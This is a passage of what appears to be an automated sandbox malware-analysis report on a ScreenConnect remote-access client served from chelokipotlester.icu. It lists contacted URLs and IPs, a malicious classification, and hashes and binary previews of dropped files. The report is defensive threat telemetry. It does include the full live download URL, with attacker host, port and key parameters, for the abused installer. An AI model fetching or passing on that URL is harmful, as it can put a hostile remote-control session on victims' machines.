                                                                                                                                          https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashxsvchost.exe, 00000007.00000003.1366547425.0000024F94641000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            		unknown
                                                                                                                                            http://www.fontbureau.com/designers?dfsvc.exe, 0000000E.00000002.2362337235.00000212BD142000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            		unknown
                                                                                                                                            https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.application2dfsvc.exe, 0000000E.00000002.2367012990.00000212BEEE0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              		unknown
                                                                                                                                              http://www.tiro.comdfsvc.exe, 0000000E.00000002.2362337235.00000212BD142000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              		unknown
                                                                                                                                              https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.application#ScreenConnect.Wihdfsvc.exe, 0000000E.00000002.2346639670.00000212A362E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                		unknown
                                                                                                                                                http://www.goodfont.co.krdfsvc.exe, 0000000E.00000002.2362337235.00000212BD142000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                		unknown
                                                                                                                                                http://schemas.microScreenConnect.WindowsClient.exe, 00000011.00000002.1948935379.000000001B469000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                		unknown
                                                                                                                                                https://dev.ditu.live.com/mapcontrol/logging.ashxsvchost.exe, 00000007.00000003.1366471908.0000024F94658000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		unknown
                                                                                                                                                  https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.application#dfsvc.exe, 0000000E.00000002.2367012990.00000212BEEE0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    		unknown
                                                                                                                                                    http://www.typography.netDdfsvc.exe, 0000000E.00000002.2362337235.00000212BD142000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    		unknown
                                                                                                                                                    https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=svchost.exe, 00000007.00000002.1366965576.0000024F94624000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      		unknown
                                                                                                                                                      http://www.galapagosdesign.com/staff/dennis.htmdfsvc.exe, 0000000E.00000002.2362337235.00000212BD142000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      		unknown
                                                                                                                                                      http://www.xrml.org/schema/2001/11/xrml2coreSdfsvc.exe, 0000000E.00000002.2346639670.00000212A32B0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        		unknown
                                                                                                                                                        http://www.w3.odfsvc.exe, 0000000E.00000002.2346639670.00000212A36CE000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A38E5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        		unknown
                                                                                                                                                        https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.WindowsClient.exxdfsvc.exe, 0000000E.00000002.2346639670.00000212A398A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          		unknown
                                                                                                                                                          http://www.fonts.comdfsvc.exe, 0000000E.00000002.2362337235.00000212BD142000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          		unknown
                                                                                                                                                          http://www.sandoll.co.krdfsvc.exe, 0000000E.00000002.2362337235.00000212BD142000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          		unknown
                                                                                                                                                          http://www.sakkal.comdfsvc.exe, 0000000E.00000002.2362337235.00000212BD142000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          		unknown
                                                                                                                                                          https://cp9856.chelokipotlester.icudfsvc.exe, 0000000E.00000002.2346639670.00000212A348D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A398A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A36CE000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A3A29000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                                                            		unknown
                                                                                                                                                            https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 00000007.00000003.1366380334.0000024F94662000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1366965576.0000024F94624000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              		unknown
                                                                                                                                                              https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashxsvchost.exe, 00000007.00000003.1366471908.0000024F94658000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                		unknown
                                                                                                                                                                http://www.apache.org/licenses/LICENSE-2.0dfsvc.exe, 0000000E.00000002.2362337235.00000212BD142000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  		unknown
                                                                                                                                                                  http://www.fontbureau.comdfsvc.exe, 0000000E.00000002.2362337235.00000212BD142000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                                  		unknown
                                                                                                                                                                  https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.WindowsFileManager.exe.configgdfsvc.exe, 0000000E.00000002.2359951085.00000212BB8EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    		unknown
                                                                                                                                                                    https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.ClientService.exe_dfsvc.exe, 0000000E.00000002.2368068234.00000212BEFDE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      		unknown
                                                                                                                                                                      https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=cp3backC7EOHWRV.log.14.dr, Unconfirmed 974768.crdownload.0.dr, chromecache_128.1.drfalse
                                                                                                                                                                        		unknown
                                                                                                                                                                        https://dev.ditu.live.com/REST/v1/Transit/Stops/svchost.exe, 00000007.00000002.1367177095.0000024F94681000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          		unknown
                                                                                                                                                                          http://www.xrml.org/schema/2001/11/xrml2coredfsvc.exe, 0000000E.00000002.2346639670.00000212A32B0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                                          		unknown
                                                                                                                                                                          https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.application#ScreenConnect.Widfsvc.exe, 0000000E.00000002.2346639670.00000212A362E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            		unknown
                                                                                                                                                                            https://dev.virtualearth.net/REST/v1/Traffic/Incidents/svchost.exe, 00000007.00000002.1367024630.0000024F9463F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1366380334.0000024F94662000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1367108889.0000024F94665000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              		unknown

                                                                                                                                                                              World Map of Contacted IPs

                                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                                              • 75% < No. of IPs

                                                                                                                                                                              Public IPs

                                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                              142.250.185.228
                                                                                                                                                                              		www.google.comUnited States
                                                                                                                                                                              		15169GOOGLEUSfalse
                                                                                                                                                                              239.255.255.250
                                                                                                                                                                              		unknownReserved
                                                                                                                                                                              		unknownunknownfalse
                                                                                                                                                                              37.221.67.19
                                                                                                                                                                              		cp3back96.siteRussian Federation
                                                                                                                                                                              		48430FIRSTDC-ASRUtrue

                                                                                                                                                                              Private

                                                                                                                                                                              IP
                                                                                                                                                                              192.168.2.16
                                                                                                                                                                              127.0.0.1

                                                                                                                                                                              General Information

                                                                                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                              Analysis ID:1544862
                                                                                                                                                                              Start date and time:2024-10-29 19:33:35 +01:00
                                                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                                                              Overall analysis duration:0h 5m 50s
                                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                                              Report type:full
                                                                                                                                                                              Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                                                                                                                              Sample URL:https://cp9856.chelokipotlester.icu/Bin/support.Client.exe?h=cp3back96.site&p=8041&k=BgIAAACkAABSU0ExAAgAAAEAAQB9zMUOcnsRaC12buOM5jB%2F0aQdWfMpUKDaWi13yRXoM16W00nLl4p0ZtEhANoxvmcw0wWFEBncKj1h1Sizr06d2epn5Y1la%2FZuAUNQxVB6zV6MkV%2FQ3PQ8O4IKEUzM%2B1uTT6bVi8cjhVOM7wlYYJcudQAB6Dwlh4JaUc5YEBvhT8MaZnAIYPqnbmxNwUw1RDlaRh5YJbZGPTJPIJpusdEO4D%2FCUtP6CZ%2F6LBYCi1k6apr4NFJdoCsgYMmz0ueWApW6fnSWePa0E3G6vxJQsjXUZXU7nn2pC9y84o5L0uqvKTZ239UPNomZv8wnSyaubzULL%2B48fuhT%2FYi9ukTBmorR&s=5999b697-2fc8-47f6-a1dc-4d0d274c363e&i=Untitled%20Session&e=Support&y=Guest&r=
                                                                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                              Number of analysed new started processes analysed:25
                                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                                              Technologies:
                                                                                                                                                                              • EGA enabled
                                                                                                                                                                              • AMSI enabled
                                                                                                                                                                              Analysis Mode:default
                                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                                              Detection:MAL
                                                                                                                                                                              Classification:mal68.evad.win@46/81@7/5

                                                                                                                                                                              Warnings

                                                                                                                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe, backgroundTaskHost.exe
                                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 142.250.184.227, 66.102.1.84, 216.58.212.174, 34.104.35.123, 184.28.90.27, 192.229.221.95, 199.232.210.172, 142.250.185.227, 172.217.16.142
                                                                                                                                                                              • Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, cacerts.digicert.com, clientservices.googleapis.com, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com, clients2.google.com, c-ring.msedge.net, edgedl.me.gvt1.com, ocsp.digicert.com, e16604.g.akamaiedge.net, ocsp.edge.digicert.com, update.googleapis.com, clients.l.google.com, t-ring-fallbacks1.msedge.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net
                                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                              • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                              • VT rate limit hit for: https://cp9856.chelokipotlester.icu/Bin/support.Client.exe?h=cp3back96.site&p=8041&k=BgIAAACkAABSU0ExAAgAAAEAAQB9zMUOcnsRaC12buOM5jB%2F0aQdWfMpUKDaWi13yRXoM16W00nLl4p0ZtEhANoxvmcw0wWFEBncKj1h1Sizr06d2epn5Y1la%2FZuAUNQxVB6zV6MkV%2FQ3PQ8O4IKEUzM%2B1uTT6bVi8cjhVOM7wlYYJcudQAB6Dwlh4JaUc5YEBvhT8MaZnAIYPqnbmxNwUw1RDlaRh5YJbZGPTJPIJpusdEO4D%2FCUtP6CZ%2F6LBYCi1k6apr4NFJdoCsgYMmz0ueWApW6fnSWePa0E3G6vxJQsjXUZXU7nn2pC9y84o5L0uqvKTZ239UPNomZv8wnSyaubzULL%2B48fuhT%2FYi9ukTBmorR&s=5999b697-2fc8-47f6-a1dc-4d0d274c363e&i=Untitled%20Session&e=Support&y=Guest&r=

                                                                                                                                                                              Simulations

                                                                                                                                                                              Behavior and APIs

                                                                                                                                                                              TimeTypeDescription
                                                                                                                                                                              14:34:07API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                                                                                                              14:34:28API Interceptor983224x Sleep call for process: dfsvc.exe modified
                                                                                                                                                                              14:34:28API Interceptor1x Sleep call for process: support.Client.exe modified
                                                                                                                                                                              14:35:14API Interceptor1x Sleep call for process: MpCmdRun.exe modified

                                                                                                                                                                              LLM Input / Output

                                                                                                                                                                              Joe Sandbox View / Context

                                                                                                                                                                              IPs

                                                                                                                                                                              No context

                                                                                                                                                                              Domains

                                                                                                                                                                              No context

                                                                                                                                                                              ASNs

                                                                                                                                                                              No context

                                                                                                                                                                              JA3 Fingerprints

                                                                                                                                                                              No context

                                                                                                                                                                              Dropped Files

                                                                                                                                                                              No context

                                                                                                                                                                              Created / dropped Files

                                                                                                                                                                              C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1310720
                                                                                                                                                                              Entropy (8bit):0.8168438845432417
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3072:yJjAgNE4Pj5vHcjTcyBP9UjaaQ/ka4qWE:QAgN8nj/ka4
                                                                                                                                                                              MD5:C0490496F823DC08A2C515AC94F1B090
                                                                                                                                                                              SHA1:24BF8B8B71A8CC1259830DED338FEA633B5645FE
                                                                                                                                                                              SHA-256:AA778C7CE69CA0CD5D0085FD84327EA7C57486C68E96C2A4FA242B09F2508C6D
                                                                                                                                                                              SHA-512:A655B76A551495D02F5D4F2C3BEEE495E40A84C56D55BF6263681593D66D28BF37DC4794D7996EEA280FA5694E8146B2384D4CDB00D350B5FA93DA1DEE3A7CF9
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:..6.........@..@.....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................d6d6.#.........`h.................h.......6.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                                                                                                                                                              C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                              File Type:Extensible storage engine DataBase, version 0x620, checksum 0x28b44850, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1310720
                                                                                                                                                                              Entropy (8bit):0.7864522398203245
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:1536:7SB2ESB2SSjlK/6vDfi5Wy10MctJ+t9ka4XQ0/Ykr3g16L2UPkLk+kyt4eCu3uZB:7azaovh7uka4Es2U1RFNp3pvHzrHBHz
                                                                                                                                                                              MD5:A47D87F8D039B5EB99EFF663F42895B3
                                                                                                                                                                              SHA1:9D8A5B40792B41E9B9A0059170FA7ADB346CF85D
                                                                                                                                                                              SHA-256:9DDB7CEAE5054CE24F2E9F6786A50CF1B8D750B91374101290DEC7E6ECA510BC
                                                                                                                                                                              SHA-512:DE14A4B3F4DC6BBF92890724EFFFF95C6C75C9F2626C070D91DDF973FFFF0BCE8503D00A98B6806BCFD7A640832D83BA472F3608598275DD6A0FF23B90CE0528
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:(.HP... ...............X\...;...{......................0.z...... ...{..."...|[.h.|.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............{...............................................................................................................................................................................................2...{......................................."...|{1.................H{.."...|{..........................#......h.|.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):16384
                                                                                                                                                                              Entropy (8bit):0.07936432973900195
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:uGEYeVK6om/Msjv/Ss/IGYZX/J+vl/lAllSdLvl+/rS56/:5EzVK6+sYIvltAQN0e
                                                                                                                                                                              MD5:4BF0FEA28136A2D38DD500BDC4E4D34A
                                                                                                                                                                              SHA1:9C060E055A7F66B6FC9C3B9FD7BC1766EC481AA4
                                                                                                                                                                              SHA-256:80CDE3D8062A0158B96E5D34F6918D66DE350761B020A1D2BD392F7E46F9795B
                                                                                                                                                                              SHA-512:8F2889A21E847EE64B5F47DDC21A102DD4F2BE8156EE4BDDE4A72DA7766BB87D9353CBAB9193547E0445CEBD973DE4AFF5856E91D49D6CB65E7CCB7E0384748B
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:.u>......................................;...{..."...|{.. ...{........... ...{... ...{..#.#.. ...{.|.................H{.."...|{.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):71954
                                                                                                                                                                              Entropy (8bit):7.996617769952133
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                                                                                                              MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                                                                                                              SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                                                                                                              SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                                                                                                              SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

                                                                                                                                                                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_BE4413523710330F97BEE5D4A544C42B

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):727
                                                                                                                                                                              Entropy (8bit):7.581021982372214
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12:5o6Tq9HF5h44TkY1Zdbh1SaIHS+j6R1k4NZ2B72qJjOGh7N0StoFFc7c9hR0NJ1y:50AY5NAUN8B7bJjl+c7c9hJf
                                                                                                                                                                              MD5:0FECCC0993702C65B5DB8E87DCB0E0CA
                                                                                                                                                                              SHA1:0C87C5C32841A3823B28A31FE8DE6CF5F29F8C5F
                                                                                                                                                                              SHA-256:A114EF8F6E3890193DA00C170526A66E2720A7A6339773E8A30CABE55F1D9366
                                                                                                                                                                              SHA-512:C352F773D1E10906354A5D514AEACD2FEAA8D47E742AF1532260EE23F97A08FCDC922DE357DEF217B92A828B918352B1023D9B5EA336CC8936D566845BF5E30F
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:0..........0.....+.....0......0...0......h7..;._....a{..e.NB..20241028225436Z0s0q0I0...+.........]....^Idk...NG.X....h7..;._....a{..e.NB....`....fB.........20241028223902Z....20241104213902Z0...*.H.............4./..'..g.7R.=.)h..)s.j{pA.....!{RL........#.q .4.@X..a..[b...fu.(...W..B..KAo.q....g0^%..pA2n.aI.3..O,M..y.U[.D.-.b....|......0..'........4.[.........+.}....A%#.V....e..0............EUM.]./...[\f9t.LQ..c.k.VC.^.4D(..J.......&.I...9.N....^.T.Y.......G..&..t...!.-..E8.D.2..$h*..9.S.U........Y.Ar.....8.%.F...f.y..]..}^..2..f...%..........5.P..........a...E..+O.#cVi|\N.O...a.6..>.s}..:.a;.q,.?.I.3.t.E.%`....t.LQz..H..~..P........o2..P@=..:z.....I.)..S(/+.k_.i..s.:.*."../`.T..[./

                                                                                                                                                                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):727
                                                                                                                                                                              Entropy (8bit):7.541233018339637
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12:5onfZbc5RlRtBfQFnsPJon73TpIlnoRiShAaPlQPwQccWSCc88udFycdJGPzaw6:5iRcdZunVn76siShA2DcWSCcsdFycrGU
                                                                                                                                                                              MD5:88B8D0E33C25FA379EBEB690CB345BE7
                                                                                                                                                                              SHA1:D61AB5D26023149919DC1F376596A1BF90F45BCD
                                                                                                                                                                              SHA-256:EDE7A96C7B26C2928F377267F2E58A3210B38E8C82E05C645F617E58DFA79D37
                                                                                                                                                                              SHA-512:11B51B1D987CEBD423608296BB95B1C01294E7EA0861700D527F08955B7FA8AEAF41BBF2B3990BEDFB7BDA4A9C277270548BB01E8AD5D1A36155363CF63D28B2
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:0..........0.....+.....0......0...0..........q]dL..g?....O..20241027184215Z0s0q0I0...+........."..;F..=\@ua..........q]dL..g?....O....@.`.L.^........20241027184215Z....20241103184215Z0...*.H.............*1.b.Z.]...pX.%8g!......-.u.F.G..v..o.*....>.%).R.y..+.d.C.^1{. 1`.{g%.#!1T&.q..;!c].w..*....wT..IK..V]eMw.3u.{h.w..r....lk./,.....S/..fM0.rU.w..o..5Q...G.B~AA U-....\5..u..........y.Sb.._......../..>H.....Z~H.Vd.V.^..B.].a..5K.w.2z...H...0b.......U.5..-..4h.H..'..P.5.....=.c.`".`.Qb.....sd.;s..V..@......z.B.......*1......t[U......*..I.7 ........:...K.V.#.i__R.T}|..:s,..5.aYF...m..$_.|v<.*...p}\p.@..........(....V._.-+.*e. ....{.yY .fD...K.6.+.B.kl"...Zh.E.W.W...lk.......Md.........2...

                                                                                                                                                                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:Certificate, Version=3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1428
                                                                                                                                                                              Entropy (8bit):7.688784034406474
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24:nIGWnSIGWnSGc9VIyy0KuiUQ+7n0TCDZJCCAyuIqwmCFUZnPQ1LSdT:nIL7LJSRQ+QgAyuxwfynPQmR
                                                                                                                                                                              MD5:78F2FCAA601F2FB4EBC937BA532E7549
                                                                                                                                                                              SHA1:DDFB16CD4931C973A2037D3FC83A4D7D775D05E4
                                                                                                                                                                              SHA-256:552F7BDCF1A7AF9E6CE672017F4F12ABF77240C78E761AC203D1D9D20AC89988
                                                                                                                                                                              SHA-512:BCAD73A7A5AFB7120549DD54BA1F15C551AE24C7181F008392065D1ED006E6FA4FA5A60538D52461B15A12F5292049E929CFFDE15CC400DEC9CDFCA0B36A68DD
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:0...0..x..........W..!2.9...wu\0...*.H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40...130801120000Z..380115120000Z0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40.."0...*.H.............0..........sh..]J<0"0i3..%..!=..Y..).=X.v..{....0....8..V.m...y....._..<R.R....~...W.YUr.h.p..u.js2...D.......t;mq.-... .. .c)-..^N..!a.4...^.[......4@_.zf.w.H.fWW.TX..+.O.0.V..{]..O^.5.1..^......@.y.x...j.8.....7...}...>..p.U.A2...s*n..|!L....u]xf.:1D.3@...ZI...g.'..O9..X..$\F.d..i.v.v=Y]Bv...izH....f.t..K...c....:.=...E%...D.+~....am.3...K...}....!........p,A`..c.D..vb~.....d.3....C....w.....!..T)%.l..RQGt.&..Au.z._.?..A..[..P.1..r."..|Lu?c.!_. Qko....O..E_. ........~.&...i/..-............B0@0...U.......0....0...U...........0...U..........q]dL..g?....O0...*.H..............a.}.l.........dh.V.w.p...J...x\.._...)V.6I]Dc...f.#.=y.mk.T..<.C@..P.R..;...ik.

                                                                                                                                                                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):338
                                                                                                                                                                              Entropy (8bit):3.4738726491832708
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6:kKrE486jsJFN+SkQlPlEGYRMY9z+s3Ql2DUevat:PXDkPlE99SCQl2DUevat
                                                                                                                                                                              MD5:E69C33172936F4E93182E21B5EB95DF1
                                                                                                                                                                              SHA1:120BA428189DE165F03322CFF75443D89C6D2CE9
                                                                                                                                                                              SHA-256:6E594BD11706A5D798FA9FCBB9E1F9AE1CE9AC8575DE4FBF5D6AC0E7EFD3F78B
                                                                                                                                                                              SHA-512:EA536463FA14D7AE0CCAEC90296C5F013B23E7A2991E4A3860F4EF24CAC97859961CA252D4FE76228284B37426CC18145983CF3EFB8A0651EDFF1B0F1EBB5903
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
